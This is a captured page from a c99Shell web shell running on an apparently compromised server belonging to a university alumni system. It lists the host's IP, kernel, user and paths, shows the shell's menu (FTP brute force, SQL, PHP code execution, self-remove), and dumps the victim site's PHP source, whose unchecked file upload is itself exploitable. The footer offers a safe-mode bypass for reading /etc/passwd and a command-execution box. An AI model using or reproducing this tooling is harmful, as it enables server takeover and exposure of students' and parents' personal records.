110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mis/ealumni/admin/ drwxr-xr-x Free 52 GB of 127.8 GB (40.69%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

<?php

include_once "../../class/clsConnection.php";

include_once "../../class/clsDB.php";

include_once "../global.php";

include_once "../class/clsalumnimain.php";

include_once "../class/clsalumnibio.php";

include_once "../link/function.php";



$oAm = new AlumniMain($oC1);

$oAb = new AlumniBio($oC1);



            $oAm->AddNew();

            $oAm->alumniId=$oAm->GetNextCode();

            $oAm->studentId=$studentId;

            $oAm->studentCode=$studentCode;

            $oAm->levelId=$levelId;

            $oAm->programId=$programId;///

            $oAm->prefixId=$prefixId;///

            $oAm->studentName=$studentName;///

            $oAm->studentSurname=$studentSurname;///

            $oAm->studentNameEng=$studentNameEng;///////

            $oAm->studentSurnameEng=$studentSurnameEng;/////

            $oAm->creditAttempt=$creditAttempt;

            $oAm->creditSatisfy=$creditSatisfy;

            $oAm->GPA=$GPA;

            $oAm->admitAcadYear=$admitAcadYear;

            $oAm->admitSemester=$admitSemester;

            $oAm->admitDate=$admitDate;

            $oAm->finishDate=$finishDate;

            $oAm->studentPassword=$studentPassword;

            $oAm->studentEmail=$studentEmail;

            $oAm->studentYear=$studentYear;

            $oAm->studentStatus=4;

            $oAm->officerId1=$officerId1;

            $oAm->officerId2=$officerId2;

            $oAm->financeStatus=$financeStatus;

            $oAm->updateUserId=$updateUserId;

            $oAm->updateDateTime=$updateDateTime;

            $oAm->citizenId=$citizenId;/////

            $oAm->graduateYear=$graduateYear;

            $oAm->genStatus=$genStatus;

            $oAm->genNo=$genNo;

            $oAm->entryTypeId=$entryTypeId;

            $oAm->entryTypeId2=$entryTypeId2;

            $oAm->studentSex=$studentSex;

            $oAm->scholarId=$scholarId;

            $oAm->preAdmitPositionId=$preAdmitPositionId;

            $oAm->totalPoint=$totalPoint;

            $oAm->honor=$honor;

            $oAm->medal=$medal;

            $oAm->exitExam=$exitExam;

            $oAm->studentStatusTmp=$studentStatusTmp;

            $oAm->importtoalumni='A';

            $oAm->glantId='N';

            $oAm->glantDate=$glantDate;

            $oAm->glantreqDate=$glantreqDate;

            $oAm->finishAcadYear=$finishAcadYear;

            

            $oAm->Save();

            

            $oAb->AddNew();

            $oAb->alumniId=$oAm->alumniId;

            $oAb->studentId=$studentId;

            $oAb->nationId=$nationId;

            $oAb->religionId=$religionId;

            $oAb->bloodGroup=$bloodGroup;

            $oAb->birthDate=splitDateForm($birthDate,"/");

            $oAb->birthProvinceId=$birthProvinceId;

            $oAb->homeAddress=$homeAddress;

            $oAb->homeDistrictId=$homeDistrictId;

            $oAb->homeAmphurId=$homeAmphurId;

            $oAb->homeProvinceId=$homeProvinceId;

            $oAb->homeZipcode=$homeZipcode;

            $oAb->homePhoneNo=$homePhoneNo;

            $oAb->officeName=$officeName;

            $oAb->officeAddress=$officeAddress;

            $oAb->officeDistrictId=$officeDistrictId;

            $oAb->officeAmphurId=$officeAmphurId;

            $oAb->officeProvinceId=$officeProvinceId;

            $oAb->officeZipcode=$officeZipcode;

            $oAb->officePhoneNo=$officePhoneNo;

            $oAb->workingStatus=$workingStatus;

            $oAb->workingPosition=$workingPosition;

            $oAb->workingSalary=$workingSalary;

            $oAb->fatherName=$fatherName;

            $oAb->fatherAddress=$fatherAddress;

            $oAb->fatherDistrictId=$fatherDistrictId;

            $oAb->fatherAmphurId=$fatherAmphurId;

            $oAb->fatherProvinceId=$fatherProvinceId;

            $oAb->fatherZipcode=$fatherZipcode;

            $oAb->fatherPhoneNo=$fatherPhoneNo;

            $oAb->fatherOccupation=$fatherOccupation;

            $oAb->fatherStatus=$fatherStatus;

            $oAb->motherName=$motherName;

            $oAb->motherAddress=$motherAddress;

            $oAb->motherDistrictId=$motherDistrictId;

            $oAb->motherAmphurId=$motherAmphurId;

            $oAb->motherProvinceId=$motherProvinceId;

            $oAb->motherZipcode=$motherZipcode;

            $oAb->motherPhoneNo=$motherPhoneNo;

            $oAb->motherOccupation=$motherOccupation;

            $oAb->motherStatus=$motherStatus;

            $oAb->studentSex=$studentSex;

            $oAb->parentName=$parentName;

            $oAb->parentRelation=$parentRelation;

            $oAb->parentAddress=$parentAddress;

            $oAb->parentDistrictId=$parentDistrictId;

            $oAb->parentAmphurId=$parentAmphurId;

            $oAb->parentProvinceId=$parentProvinceId;

            $oAb->parentZipcode=$parentZipcode;

            $oAb->parentPhoneNo=$parentPhoneNo;

            $oAb->parentMobile=$parentMobile;

            $oAb->parentOcc=$parentOcc;

            $oAb->parentIncome=$parentIncome;

            $oAb->parentEmail=$parentEmail;

            $oAb->contactPerson=$contactPerson;

            $oAb->contactAddress=$contactAddress;

            $oAb->contactDistrictId=$contactDistrictId;

            $oAb->contactAmphurId=$contactAmphurId;

            $oAb->contactProvinceId=$contactProvinceId;

            $oAb->contactZipcode=$contactZipcode;

            $oAb->contactPhoneNo=$contactPhoneNo;

            $oAb->cardExpiryDate=$cardExpiryDate;

            $oAb->currentAddress=$currentAddress;

            $oAb->currentDistrictId=$currentDistrictId;

            $oAb->currentAmphurId=$currentAmphurId;

            $oAb->currentProvinceId=$currentProvinceId;

            $oAb->currentZipcode=$currentZipcode;

            $oAb->currentPhoneNo=$currentPhoneNo;

            $oAb->graduateAddress=$graduateAddress;

            $oAb->graduateDistrictId=$graduateDistrictId;

            $oAb->graduateAmphurId=$graduateAmphurId;

            $oAb->graduateProvinceId=$graduateProvinceId;

            $oAb->graduateZipcode=$graduateZipcode;

            $oAb->graduatePhoneNo=$graduatePhoneNo;

            $oAb->maritalStatusId=$maritalStatusId;

            $oAb->weight=$weight;

            $oAb->height=$height;

            // Picture

            $rootdir = "../picturePerson";

            $picturePath="$rootdir/".$uploadfile_name;            

            if($picturePath=='../picturePerson/')

                $picturePath="";

            else

                   copy($uploadfile,$picturePath);



            $oAb->picturePath=$picturePath;

            $oAb->recruitmentTypeId=$recruitmentTypeId;

            $oAb->occExamResult=$occExamResult;

            $oAb->canRefund=$canRefund;

            $oAb->oldStudentName=$oldStudentName;

            $oAb->entryDegree=$entryDegree;

            $oAb->healthPrivId=$healthPrivId;

            $oAb->o1prefixId=$o1prefixId;

            $oAb->o1fName=$o1fName;

            $oAb->o1lName=$o1lName;

            $oAb->o2prefixId=$o2prefixId;

            $oAb->o2fName=$o2fName;

            $oAb->o2lName=$o2lName;



            $oAb->Save();



 echo "<meta http-equiv='refresh' content='0; URL=addalumni_alumni.php'>";

?>
:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:
:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/
:: Command execute ::
Enter:	Select: